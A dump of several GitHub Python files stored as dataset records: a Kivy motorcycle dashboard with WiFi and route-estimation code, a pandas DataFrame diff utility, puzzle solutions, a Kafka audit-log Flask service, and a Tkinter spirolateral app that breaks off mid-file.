scan = os.popen(\"nmcli device wifi list --rescan yes\").read()\n isConnect = os.popen(self.commandl).read()\n # isConnect = True\n except:\n isConnect = \"\";\n \n if isConnect != \"\":\n self.popup = MDDialog(title='terhubung dengan internet \\n wifi id : '+name,\n radius=[7, 7, 7, 7],\n md_bg_color=(25/255,135/255,84/255,1),\n size_hint=(None, None), size=(400, 400))\n self.root.ids.wifi_status.icon = \"wifi-on\"\n self.root.ids.wifi_status.text_color = 255/255,255/255,255/255,1\n self.popup.open()\n else:\n self.popup = MDDialog(title='tidak dapat terhubung dengan internet',\n text=\"kirim wifi id dan password kembali\",\n radius=[7, 7, 7, 7],\n md_bg_color=(244/255,67/255,54/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n # self.sub(self.commandl)\n \n # function to display avavilabe Wifi networks \n # def displayAvailableNetworks(self):\n # self.commandl = \"nmcli dev wifi\"\n # self.sub(self.commandl)\n\n\n # def sub(self,command):\n # self.proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n # (out, err) = self.proc.communicate()\n # print (\"program output : \", out)\n # print (\"error : \",err)\n \n def move_s_mini1(self):\n self.ids.screendget_mini.switch_to(self.ids.s_mini1)\n\n\n 
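# A minimal sketch of how the estimation model in estimasi() below is\n    # consumed (grounded in the code there; the sample numbers are\n    # hypothetical): the scaler and regressor loaded from 'std_rev1.bin'\n    # and 'estimasi_rev1.pkl' score a [SOC %, speed mode, distance km] row:\n    #\n    #     features = [[80.0, 60.0, 12.5]]\n    #     estimate = model.predict(scaler.transform(features))\n    #\n    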
def move_s_mini2(self):\n self.ids.screendget_mini.switch_to(self.ids.s_mini2)\n\n def estimasi(self, destinationLat, destinationLng, SOC_value):\n # lay = MyLayout()\n #path_to_kv_file = \"test.kv\"\n #gmaps = googlemaps.Client(key=API_key)\n \n scaler = joblib.load('std_rev1.bin')\n model = joblib.load('estimasi_rev1.pkl')\n\n self.lat = destinationLat\n self.lng = destinationLng\n self.OriginLat = -7.2849060923904085\n self.OriginLng = 112.7961434972626\n # self.lat = -7.277094626336178\n # self.lng = 112.7974416864169\n body = {\"locations\":[[self.OriginLng,self.OriginLat],[self.lng,self.lat]],\"metrics\":[\"distance\",\"duration\"],\"units\":\"km\"}\n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n 'Authorization': self.API_key,\n 'Content-Type': 'application/json; charset=utf-8'\n }\n post_matrix = requests.post('https://api.openrouteservice.org/v2/matrix/driving-car', json=body, headers=headers)\n\n try:\n data_matrix = json.loads(post_matrix.text)\n duration = data_matrix['durations'][0][1]\n TrueDistance = data_matrix['distances'][0][1]\n self.ids.DummyDistance.text = str(TrueDistance) + \" km\"\n self.ids.DummyTimeEst.text = str(duration) + \" s\"\n except Exception as e:\n print('INVALID REQUEST DISTANCE :',str(e) )\n \n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n }\n get_geocode_origin = requests.get('https://api.openrouteservice.org/geocode/reverse?api_key='+self.API_key+'&point.lon='+str(self.OriginLng)+'&point.lat='+str(self.OriginLat)+'&size=2', headers=headers)\n get_geocode_destination = requests.get('https://api.openrouteservice.org/geocode/reverse?api_key='+self.API_key+'&point.lon='+str(self.lng)+'&point.lat='+str(self.lat)+'&size=2', headers=headers)\n\n try:\n geocode_origin = json.loads(get_geocode_origin.text)\n geocode_destination = json.loads(get_geocode_destination.text)\n place_name_origin = geocode_origin[\"features\"][0][\"properties\"][\"label\"]\n place_name_destination = geocode_destination[\"features\"][0][\"properties\"][\"label\"]\n self.ids.lokasi_label.text = \"ASAL : %s\\nTUJUAN : %s\" %(place_name_origin,place_name_destination)\n # print(call.status_code, call.reason)\n print(place_name_destination)\n except Exception as e:\n print('INVALID REQUEST DISTANCE :',str(e) )\n\n try:\n SOC_value = self.ids.SOC_bar.current_percent\n print(\"SOC : \",SOC_value)\n SOC = SOC_value\n # SOC = SOC_value.replace(\"%\",\"\")\n print(float(SOC))\n eco = 45\n normal = 60\n sport = 70\n speedmode = [eco, normal, sport]\n except Exception as e:\n print('INVALID STORING DATA :',str(e) )\n \n\n try:\n length = TrueDistance\n for x in speedmode:\n coba = [[float(SOC), float(x), float(length)]]\n data = scaler.transform(coba)\n test = model.predict(data)\n print(\"estimasi pemakaian energi : \",float(x),float(test))\n if (float(SOC) - (3/100)*5 <= float(test)):\n if x == eco:\n estimasi_eco = \"TIDAK CUKUP\"\n elif x == normal:\n estimasi_normal = \"TIDAK CUKUP\"\n elif x == sport:\n estimasi_sport = \"TIDAK CUKUP\"\n\n elif (float(SOC) - (3/100)*5 > float(test)):\n if x == eco:\n estimasi_eco = \"CUKUP\"\n elif x == normal:\n estimasi_normal = \"CUKUP\"\n elif x == sport:\n estimasi_sport = \"CUKUP\"\n # satu rekomendasi\n self.ids.recommendation.text = str(estimasi_normal)\n self.popup = MDDialog(title='Estimasi berhasil',\n text= 'ECO : '+estimasi_eco+'\\nNORMAL :'+estimasi_normal+'\\nSPORT :'+estimasi_sport,\n radius=[7, 7, 7, 7],\n 
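# the same success green as the connection dialog in connect() above\n                                  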
md_bg_color=(25/255,135/255,84/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n except Exception as e:\n print('estimation error ni :',str(e) )\n self.popup = MDDialogMap(title='Estimasi gagal',\n text= 'pastikan kendaraan terkoneksi dengan internet',\n radius=[7, 7, 7, 7],\n md_bg_color=(244/255,67/255,54/255,1),\n size_hint=(None, None), size=(400, 400))\n self.popup.open()\n\n # tiga rekomendasi\n # self.ids.recommendation.text = \"ECO : %s\\n\\nNORMAL : %s\\n\\nSPORT : %s\" %(estimasi_eco, estimasi_normal, estimasi_sport)\n\n\n\nclass MDDialog(MDDialog):\n \n def __init__(self, **kwargs):\n super(MDDialog, self).__init__(**kwargs)\n # call dismiss_popup in 2 seconds\n Clock.schedule_once(self.dismiss_popup, 7)\n\n def dismiss_popup(self, *args):\n self.dismiss()\n\nclass MDDialogMap(MDDialog):\n \n def __init__(self, **kwargs):\n super(MDDialog, self).__init__(**kwargs)\n # call dismiss_popup in 2 seconds\n Clock.schedule_once(self.dismiss_popup, 12)\n\n def dismiss_popup(self, *args):\n self.dismiss() \n \n \n\nclass LineMapLayer(MapLayer):\n def __init__(self,lat,lng,OriginLat,OriginLng, **kwargs):\n super(LineMapLayer, self).__init__(**kwargs)\n\n this_path = str(os.getcwd())\n path = this_path+\"/.key/api-key.txt\"\n API_file = open(path,\"r\")\n print(API_file)\n self.API_key_map = API_file.read()\n API_file.close()\n #self.zoom = 16\n\n url = \"https://api.openrouteservice.org/v2/directions/driving-car?&api_key=\"+self.API_key_map\n\n #testing Dummies\n #-7.289612, 112.796190\n\n start = \"&start=\"+str(OriginLng)+\",\"+str(OriginLat)\n end = \"&end=\"+str(lng)+\",\"+str(lat)\n\n final = url + start + end\n payload={}\n headers = {\n 'Accept': 'application/json, application/geo+json, application/gpx+xml, img/png; charset=utf-8',\n }\n\n response = requests.request(\"GET\", final, headers=headers, data=payload)\n hasil = json.loads(response.text)\n polyCoordinates = hasil['features'][0]['geometry']['coordinates']\n\n\n self._coordinates = [[polyCoordinates[0][1], polyCoordinates[0][0]]]\n for i in range(1, len(polyCoordinates)):\n # self.points =polyCoordinates[i-1], polyCoordinates[i]\n self.points =(polyCoordinates[i][1], polyCoordinates[i][0])\n self._coordinates.append(self.points)\n self._line_points = None\n self._line_points_offset = (0, 0)\n self.zoom = 9\n \n \n # geo_dover = [51.126251, 1.327067]\n # geo_calais = [50.959086, 1.827652]\n \n # # NOTE: Points must be valid as they're no longer clamped\n # self.coordinates = [geo_dover, geo_calais]\n # for i in range(25000-2):\n # self.coordinates.append(self.gen_point())\n @property\n def coordinates(self):\n return self._coordinates\n @coordinates.setter\n def coordinates(self, coordinates):\n self._coordinates = coordinates\n self.invalidate_line_points()\n self.clear_and_redraw()\n\n @property\n def line_points(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points\n\n @property\n def line_points_offset(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points_offset\n @property\n def line_points_offset(self):\n if self._line_points is None:\n self.calc_line_points()\n return self._line_points_offset\n def calc_line_points(self):\n # Offset all points by the coordinates of the first point, to keep coordinates closer to zero.\n # (and therefore avoid some float precision issues when drawing lines)\n self._line_points_offset = (self.get_x(self.coordinates[0][1]), self.get_y(self.coordinates[0][0]))\n # Since lat is not a linear 
transform we must compute manually\n self._line_points = [(self.get_x(lon) - self._line_points_offset[0], self.get_y(lat) - self._line_points_offset[1]) for lat, lon in self.coordinates]\n\n\n\n def invalidate_line_points(self):\n self._line_points = None\n self._line_points_offset = (0, 0)\n \n def get_x(self, lon):\n \"\"\"Get the x position on the map using this map source's projection\n (0, 0) is located at the top left.\n \"\"\"\n return clamp(lon, MIN_LONGITUDE, MAX_LONGITUDE) *self.ms /360.\n \n def get_y(self, lat):\n \"\"\"Get the y position on the map using this map source's projection\n (0, 0) is located at the top left.\n \"\"\"\n lat = radians(clamp(-lat, MIN_LATITUDE, MAX_LATITUDE))\n return ((1.0 - log(tan(lat) + 1.0 / cos(lat)) / pi )) *self.ms /2.0\n \n def reposition(self):\n mapview = self.parent\n\n # Must redraw when the zoom changes\n # as the scatter transform resets for the new tiles\n if (self.zoom != mapview.zoom):\n map_source = mapview.map_source\n self.ms = pow(2.0, mapview.zoom) * map_source.dp_tile_size\n self.invalidate_line_points()\n self.clear_and_redraw()\n\n def clear_and_redraw(self, *args):\n with self.canvas:\n # Clear old line\n self.canvas.clear()\n\n # FIXME: Why is 0.05 a good value here? Why does 0 leave us with weird offsets?\n Clock.schedule_once(self._draw_line, 0.05) \n def _draw_line(self, *args):\n mapview = self.parent\n self.zoom = 12\n self.zoom = mapview.zoom\n \n # When zooming we must undo the current scatter transform\n # or the animation distorts it\n scatter = mapview._scatter\n sx,sy,ss = scatter.x, scatter.y, scatter.scale\n vx,vy,vs = mapview.viewport_pos[0], mapview.viewport_pos[1], mapview.scale\n \n # Account for map source tile size and mapview zoom\n \n #: Since lat is not a linear transform we must compute manually \n line_points = []\n for lat,lon in self.coordinates:\n line_points.extend((self.get_x(lon),self.get_y(lat)))\n #line_points.extend(mapview.get_window_xy_from(lat,lon,mapview.zoom))\n \n \n with self.canvas:\n # Clear old line\n self.canvas.clear()\n \n # Undo the scatter animation transform\n Translate(*mapview.pos)\n Scale(1/ss,1/ss,1)\n Translate(-sx,-sy)\n \n # Apply the get window xy from transforms\n Scale(vs,vs,1)\n Translate(-vx,-vy)\n \n # Apply the what we can factor out of the mapsource long, lat to x, y conversion\n Translate(self.ms / 2, 0)\n\n # Translate by the offset of the line points (this keeps the points closer to the origin)\n Translate(*self.line_points_offset)\n\n \n # Draw new\n Color(31/255,146/255,161/255,1 )\n Line(points=self.line_points, width=6/2, joint=\"round\")#4/ms)#6., joint=\"round\",joint_precision=100)\n Color(146/255,218/255,241/255,1)\n Line(points=self.line_points, width=4 / 2)\n \n\nclass NoValueSpeedMeter(SpeedMeter):\n\n def value_str(self, n): return ''\n\n_displayed = { \n 0: '0',\n 30: u'\\u03a0 / 6', 60: u'\\u03a0/3', 90: u'\\u03a0/2', 120: u'2\\u03a0/3',\n 150: u'5\\u03a0/6',\n 180: u'\\u03a0', 210: u'7\\u03a0/6', 240: u'4\\u03a0/3'\n }\n \ndef reset():\n import kivy.core.window as window\n from kivy.base import EventLoop\n if not EventLoop.event_listeners:\n from kivy.cache import Cache\n window.Window = window.core_select_lib('window', window.window_impl, True)\n Cache.print_usage()\n for cat in Cache._categories:\n Cache._objects[cat] = {} \n\n#MyLayout.estimasi.has_been_called = False\n# lay = MyLayout()\nreset()\nDashboard().run()\nos.system(\"sudo killall python\")\n\n##ifi = Popen(\"python3 testing.py\", shell=True);\n#stdout = blu.communicate()\n#blu_val 
= blu.stdout.read()\n#print(blu_val)\n","repo_name":"XRayrahman/smart-dashboard_motorcycle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21656981563","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n:Purpose: This module provides DataFrame differencing logic.\r\n\r\n The caller creates an instance which accepts the two DataFrames\r\n to be compared as the arguments. When the\r\n :meth:`~DataFrameDiff.diff` method is called, a list of columns\r\n containing value mismatches is compiled. Then, the list of column\r\n mismatches is iterated with each value in the column being\r\n compared. All value mismatches are reported to the terminal.\r\n\r\n:Platform: Linux/Windows | Python 3.6+\r\n:Developer: J Berendt\r\n:Email: support@s3dev.uk\r\n\r\n:Note: It's worth noting that current functionality **does not\r\n check data types**, unlike the pandas ``pd.DataFrame.equals()``\r\n method. This functionality may be added in a future release.\r\n\r\n:Example:\r\n\r\n Short example for differencing two DataFrames::\r\n\r\n >>> from utils4 import dfdiff\r\n\r\n >>> d = dfdiff.DataFrameDiff(df_source, df_test)\r\n >>> d.diff()\r\n\r\n\"\"\"\r\n# pylint: disable=wrong-import-order\r\n\r\nimport pandas as pd\r\nfrom itertools import zip_longest\r\ntry:\r\n from .user_interface import ui\r\nexcept ImportError: # pragma: nocover\r\n from user_interface import ui\r\n\r\n\r\nclass _Messages:\r\n \"\"\"This private class handles the messaging for DataFrame differencing.\"\"\"\r\n\r\n _FMT = '{:<10}\\t{:<10}\\t{:<25}\\t{:<25}'\r\n\r\n @staticmethod\r\n def column_mismatches(columns: list):\r\n \"\"\"List columns with mismatches.\r\n\r\n Args:\r\n columns (list): A list of columns containing mismatches.\r\n\r\n \"\"\"\r\n # pylint: disable=consider-using-f-string\r\n ui.print_('\\nColumn mismatches:', fore='cyan', style='normal')\r\n print(*map('- {}'.format, columns), sep='\\n')\r\n\r\n @staticmethod\r\n def column_mismatches_none():\r\n \"\"\"Print message for no column mismatches.\"\"\"\r\n ui.print_('\\nNo mismatches for this set.', fore='green')\r\n\r\n def data_mismatches(self, column: str, mismatches: list):\r\n \"\"\"Print the data mismatches.\r\n\r\n Args:\r\n column (str): Name of the column being analysed.\r\n mismatches (list): A list of tuples containing data mismatches,\r\n as::\r\n\r\n [(0, 0, 1, 2), (1, 1, 3, 4)]\r\n\r\n \"\"\"\r\n ui.print_(f'Data mismatches for column: {column}', fore='yellow')\r\n print(self._FMT.format('SrcRow', 'TstRow', 'SrcValue', 'TstValue'))\r\n print('-'*92)\r\n print(*(self._FMT.format(*m) for m in mismatches), sep='\\n')\r\n print()\r\n\r\n @staticmethod\r\n def data_mismatches_none(column: str):\r\n \"\"\"Print message for no data mismatches.\r\n\r\n Args:\r\n column (str): Name of the column being analysed.\r\n\r\n \"\"\"\r\n ui.print_(f'\\nNo data mismatches for {column}', fore='green')\r\n\r\n\r\nclass DataFrameDiff:\r\n \"\"\"Test and report differences in two pandas DataFrames.\r\n\r\n Args:\r\n df_source (pd.DataFrame): DataFrame containing **source** data.\r\n This dataset holds the **expected** results.\r\n df_test (pd.DataFrame): DataFrame containing the **test** data.\r\n This dataset is compared against the 'expected' dataset.\r\n\r\n \"\"\"\r\n\r\n def __init__(self, df_source: pd.DataFrame, df_test: pd.DataFrame):\r\n \"\"\"DataFrame difference class initialiser.\"\"\"\r\n self._df_s 
= df_source\r\n        self._df_t = df_test\r\n        self._col_mismatches = []\r\n        self._msg = _Messages()\r\n\r\n    def diff(self):\r\n        \"\"\"Compare DataFrames and report the differences.\"\"\"\r\n        self._get_mismatches()\r\n        self._report()\r\n\r\n    def _get_mismatches(self):\r\n        \"\"\"Build a list of columns with mismatches.\"\"\"\r\n        # Add a column to the list if it contains a mismatch.\r\n        mis = [col for col in self._df_s.columns\r\n               if not self._df_t[col].equals(self._df_s[col])]\r\n        # Store the list before reporting so the report reflects this run.\r\n        self._col_mismatches = mis\r\n        if mis:\r\n            self._msg.column_mismatches(columns=mis)\r\n        else:\r\n            self._msg.column_mismatches_none()\r\n\r\n    def _report(self) -> None:\r\n        \"\"\"Compare values in mismatched columns and report.\"\"\"\r\n        for col in self._col_mismatches:\r\n            mismatches = []\r\n            # Zip source and test datasets.\r\n            for (idx1, row1), (idx2, row2) in zip_longest(self._df_s.iterrows(),\r\n                                                          self._df_t.iterrows(),\r\n                                                          fillvalue=(None, None)):\r\n                # Catch if a row exists in one dataset and not the other.\r\n                if any([row1 is None, row2 is None]):\r\n                    idx1 = idx1 if idx1 is not None else idx2\r\n                    idx2 = idx2 if idx2 is not None else idx1\r\n                    val1 = str(row1[col]) if row1 is not None else 'no value (source)'\r\n                    val2 = str(row2[col]) if row2 is not None else 'no value (test)'\r\n                # Convert datetimes to string for compare.\r\n                elif isinstance(row2[col], pd.Timestamp):\r\n                    val1 = str(row1[col])\r\n                    val2 = str(row2[col])\r\n                # Enable compare of nan types.\r\n                elif any([pd.isna(row1[col]), pd.isna(row2[col])]):\r\n                    # Convert mismatched nan/NaT types to 'NaT' string.\r\n                    if all([pd.isna(row1[col]), row2[col] is pd.NaT]):\r\n                        val1 = 'NaT'\r\n                        val2 = 'NaT'\r\n                    else:\r\n                        val1 = str(row1[col])\r\n                        val2 = str(row2[col])\r\n                # Reformat floats to align.\r\n                elif any([isinstance(row1[col], float), isinstance(row2[col], float)]):\r\n                    val1 = round(float(row1[col]), 5)\r\n                    val2 = round(float(row2[col]), 5)\r\n                else:\r\n                    # Convert to string for each compare.\r\n                    val1 = str(row1[col])\r\n                    val2 = str(row2[col])\r\n                # Do the compare.\r\n                if val1 != val2:\r\n                    # Add any mismatches to a list for reporting.\r\n                    mismatches.append((idx1, idx2, val1, val2))\r\n            if mismatches:\r\n                self._msg.data_mismatches(column=col, mismatches=mismatches)\r\n            else:\r\n                self._msg.data_mismatches_none(column=col)\r\n","repo_name":"S3DEV/utils4","sub_path":"utils4/dfdiff.py","file_name":"dfdiff.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36260189835","text":"class Solution:\n    def numIslands(self, grid) -> int:\n        directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n        m = len(grid)\n        if m == 0:\n            return 0\n        n = len(grid[0])\n        mark = [[False for i in range(n)] for i in range(m)]\n        res = 0\n\n        def doMark(row, col):\n            mark[row][col] = True\n            for direction in directions:\n                new_row = row + direction[0]\n                new_col = col + direction[1]\n                if 0 <= new_row < m and 0 <= new_col < n and grid[new_row][new_col] == \"1\" and mark[new_row][new_col] is False:\n                    doMark(new_row, new_col)\n\n        for i in range(m):\n            for j in range(n):\n                if grid[i][j] == \"1\" and mark[i][j] is False:\n                    doMark(i, j)\n                    res += 1\n\n        return res\n\n\nslu = Solution()\nprint(slu.numIslands([]))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/medium/p200_numIslands.py","file_name":"p200_numIslands.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22904436786","text":"from 
aocd import get_data\nimport math\n\ndata = get_data(day=12).split(\"\\n\")\n\ncurr_angle = 0\npos1 = [0, 0]\npos2 = [0, 0]\nwaypoint = [10, 1]\ndirs = {\"N\": 90, \"W\": 180, \"S\": 270, \"E\": 0}\n\nfor v in data:\n d = v[0]\n a = int(v[1:])\n\n if d == \"F\":\n pos1[0] += round(math.cos(curr_angle) * a)\n pos1[1] += round(math.sin(curr_angle) * a)\n pos2[0] += waypoint[0] * a\n pos2[1] += waypoint[1] * a\n elif d in dirs:\n ang = math.radians(dirs[d])\n pos1[0] += round(math.cos(ang) * a)\n pos1[1] += round(math.sin(ang) * a)\n waypoint[0] += round(math.cos(ang)) * a\n waypoint[1] += round(math.sin(ang)) * a\n else:\n a_r = math.radians(a)\n if d == \"L\":\n curr_angle += math.radians(a)\n else:\n curr_angle -= math.radians(a)\n a_r = -a_r\n\n x, y = waypoint\n x_p = round(x * math.cos(a_r) - y * math.sin(a_r))\n y_p = round(y * math.cos(a_r) + x * math.sin(a_r))\n waypoint = [x_p, y_p]\n\nprint(abs(pos1[0]) + abs(pos1[1]))\nprint(abs(pos2[0]) + abs(pos2[1]))","repo_name":"13Ducks/advent-of-code-2020","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24743778084","text":"import connexion\nfrom pykafka import KafkaClient\nimport yaml\nimport logging\nimport logging.config\nimport json\nfrom flask_cors import CORS, cross_origin\nimport os\n\n\nif \"TARGET_ENV\" in os.environ and os.environ[\"TARGET_ENV\"] == \"test\":\n print(\"In Test Environment\")\n app_conf_file = \"/config/app_conf.yml\"\n log_conf_file = \"/config/log_conf.yml\"\nelse:\n print(\"In Dev Environment\")\n app_conf_file = \"app_conf.yml\"\n log_conf_file = \"log_conf.yml\"\n\n\nwith open(app_conf_file, 'r') as f:\n app_config = yaml.safe_load(f.read())\n\n# External Logging Configuration\nwith open(log_conf_file, 'r') as f:\n log_config = yaml.safe_load(f.read())\n logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info(\"App Conf File: %s\"% app_conf_file)\nlogger.info(\"Log Conf File: %s\"% log_conf_file)\n\n\n\ndef get_inventory_count(index):\n hostname = \"%s:%d\" % (app_config['events']['hostname'],\n app_config['events']['port'])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config['events']['topic'])]\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n \n logger.info(\"Retrieving count at index %d\" % index)\n try:\n count_events = []\n\n for msg in consumer:\n msg_str = msg.value.decode(\"utf-8\")\n msg = json.loads(msg_str)\n print(msg)\n # find event at index + return event & 200\n if msg['type'] == 'count':\n count_events.append(msg)\n \n if index in range(0, len(count_events)):\n return count_events[index], 200\n else:\n \n return {\"message\": \"Not found\"}, 404\n\n\n except:\n logger.error(\"No more messages found\")\n print()\n \n logger.error(\"Could not find count at index %d\" % index)\n return {\"message\": \"Not found\"}, 404\n\n\n\n\n\n\n\n\n\ndef get_checked_items(index):\n hostname = \"%s:%d\" % (app_config['events']['hostname'],\n app_config['events']['port'])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config['events']['topic'])]\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n \n logger.info(\"Retrieving checked item at index %d\" % index)\n try:\n check_events = []\n\n for msg in consumer:\n msg_str = msg.value.decode(\"utf-8\")\n msg = 
json.loads(msg_str)\n\n # find event at index + return event & 200\n if msg['type'] == 'check':\n check_events.append(msg)\n \n if index in range(0, len(check_events)):\n return check_events[index], 200\n else:\n return {\"message\": \"Not found\"}, 404\n\n\n except:\n logger.error(\"No more messages found\")\n print()\n \n logger.error(\"Could not find checked item at index %d\" % index)\n return {\"message\": \"Not found\"}, 404\n\napp = connexion.FlaskApp(__name__, specification_dir=\"\")\n\nif \"TARGET_ENV\" not in os.environ or os.environ[\"TARGET_ENV\"] != \"test\":\n CORS(app.app)\n app.app.config['CORS_HEADERS'] = 'Content-Type'\n\napp.add_api(\"openapi.yml\", base_path=\"/audit_log\", strict_validation=True, validate_responses=True)\n\nif __name__ == \"__main__\":\n app.run(port=8110)\n","repo_name":"ricadv/rfid_app","sub_path":"audit_log/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4553270133","text":"from tkinter import *\nimport turtle\n\n\nclass Spirolateral:\n '''\n Spirolateral Class that stores the necessary data for a spirolateral\n '''\n\n def __init__(self, name: str, timestable: int, angle: int):\n '''Constructor method'''\n self.name = name\n self.timestable = timestable\n self.angle = angle\n self.digitalList = []\n\n def digit_root(self, n):\n '''Calculates a digital root(modulo9)'''\n return (n - 1) % 9 + 1 if n else 0\n\n def digitCalc(self):\n '''Calculates a 'times table list' that is used\n as a range for the turtle to draw'''\n for i in range(20):\n test = (i+1)\n\n n = int(test * self.timestable)\n value = self.digit_root(n)\n if value in self.digitalList:\n break\n else:\n self.digitalList.append(value)\n return(self.digitalList)\n\n\nclass Application(Frame):\n '''\n GUI Application\n '''\n\n def __init__(self, master):\n super().__init__(master) # to ensure parent is called correctly.\n # Set the windows title,\n # calls winfo_toplevel to ensure the correct root is modified.\n self.winfo_toplevel().title(\"Spirolaterals\")\n\n # Constants for formatting\n self.BG_COL = \"#4286f4\"\n self.PX = 20\n self.PY = 10\n self.WDTH = 800\n self.HGHT = 400\n\n # setting up a main container\n self.__maincontainer = Frame(master, width=self.WDTH, height=self.HGHT)\n self.__maincontainer.grid(row=0, column=0, sticky=\"nsew\")\n\n # Setting up the initial frame for the home window.\n self.__homeframe = Frame(self.__maincontainer,\n width=self.WDTH/2, height=self.HGHT)\n self.__homeframe.grid(row=0, column=0, sticky=\"nsew\")\n\n # header in the homeframe\n self.displaying_header = Frame(self.__homeframe, bg=self.BG_COL,\n width=self.WDTH/2, height=60)\n self.displaying_header.grid_propagate(0)\n self.displaying_header.grid(row=0, columnspan=2)\n\n # Setting up the frame for the canvas\n self.__canvasframe = Frame(\n self.__maincontainer, width=self.WDTH/2, height=self.HGHT)\n self.__canvasframe.grid_propagate(0) # to reserve space.\n self.__canvasframe.grid(row=0, column=1, sticky='E')\n\n self.canvas = Canvas(self.__canvasframe,\n height=self.HGHT, width=self.WDTH/2)\n self.canvas.grid(row=0, column=3)\n\n # Setting up the frame for the data input\n self.__inputframe = Frame(self.__maincontainer, width=self.WDTH/2,\n height=self.HGHT)\n self.__inputframe.grid_propagate(0)\n\n self.collecting_header = Frame(self.__inputframe, bg=self.BG_COL,\n width=self.WDTH/2, height=60)\n self.collecting_header.grid_propagate(0) # preserves the space 
we want\n self.collecting_header.grid(row=0, columnspan=2)\n\n collecting_label = Label(self.collecting_header, bg=self.BG_COL,\n text=\"Collecting Spiro Data\")\n collecting_label.grid(row=0, column=0, padx=self.PX, pady=self.PY)\n\n # data validation for our Entry boxes.\n self.vcmd = (master.register(self.validate_int),\n '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')\n # the list that will store our spiros\n self.spirolateralist = []\n\n self.create_home_widgets()\n self.create_input_widgets()\n\n # setup turtle elements\n self.spiroTurt = turtle.RawTurtle(self.canvas)\n self.spiroTurt.hideturtle()\n\n def create_home_widgets(self):\n '''\n Method for creating widgets on the home frame.\n '''\n displaying_label = Label(\n self.displaying_header, bg=self.BG_COL,\n text=\"Displaying Spiro Data\")\n displaying_label.grid(row=0, column=0, padx=self.PX, pady=self.PY)\n\n self.go_to_collect_btn = Button(\n self.displaying_header, width=10, text=\"Add Spiro\",\n command=self.inputGrid)\n self.go_to_collect_btn.grid(row=0, column=1, padx=self.PX,\n pady=self.PY)\n\n name_label_d = Label(self.__homeframe, anchor=NW,\n text=\"Spiro Name:\")\n name_label_d.grid(row=1, column=0, sticky=NW, padx=self.PX,\n pady=self.PY)\n\n self.first_name = Label(self.__homeframe, anchor=NW)\n self.first_name.grid(row=1, column=1, sticky=NW, pady=self.PY)\n\n timestable_label_d = Label(self.__homeframe, anchor=NW,\n text=\"Times Table: \")\n timestable_label_d.grid(row=2, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.age = Label(self.__homeframe, anchor=NW)\n self.age.grid(row=2, column=1, sticky=NW, pady=self.PY)\n\n angel_label_d = Label(self.__homeframe, anchor=NW, text=\"Angle:\")\n angel_label_d.grid(row=3, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.angel = Label(self.__homeframe, anchor=NW)\n self.angel.grid(row=3, column=1, sticky=NW, pady=self.PY)\n\n self.mobile_info = Label(self.__homeframe)\n self.mobile_info.grid(row=4, columnspan=2)\n\n self.prev_btn = Button(self.__homeframe, text=\"Previous\",\n state=DISABLED, command=self.previous)\n self.prev_btn.grid(row=5, column=0,\n padx=self.PX/2, pady=self.PY, sticky='W')\n\n self.next_btn = Button(self.__homeframe, text=\"Next\",\n state=DISABLED, command=self.next_person)\n self.next_btn.grid(row=5, column=1,\n padx=self.PX/2, pady=self.PY, sticky='E')\n self.__index = 0 # to maintain our position in the list.\n\n self.turtleDrawButt = Button(\n self.__homeframe, text=\"Draw this Spiro.\",\n command=self.turtleSpiroDraw)\n self.turtleDrawButt.grid(row=5, columnspan=2, pady=15)\n\n def create_input_widgets(self):\n '''\n Method for creating widgets on the input frame\n '''\n self.go_to_display_btn = Button(\n self.collecting_header, width=10, text=\"Show All\",\n command=self.homeGrid)\n self.go_to_display_btn.grid(\n row=0, column=1, padx=self.PX, pady=self.PY)\n\n fname_label = Label(self.__inputframe, anchor=NW,\n text=\"Spiro Name:\")\n fname_label.grid(row=1, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.spiro_name_entry = Entry(self.__inputframe)\n self.spiro_name_entry.grid(row=1, column=1, sticky=NW,\n pady=self.PY, padx=self.PX)\n\n timestable_label = Label(\n self.__inputframe, anchor=NW, text=\"Times Table:\")\n timestable_label.grid(row=2, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.seg_ent = Entry(\n self.__inputframe, validate='key', validatecommand=self.vcmd)\n self.seg_ent.grid(row=2, column=1, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n angel_label = Label(self.__inputframe, 
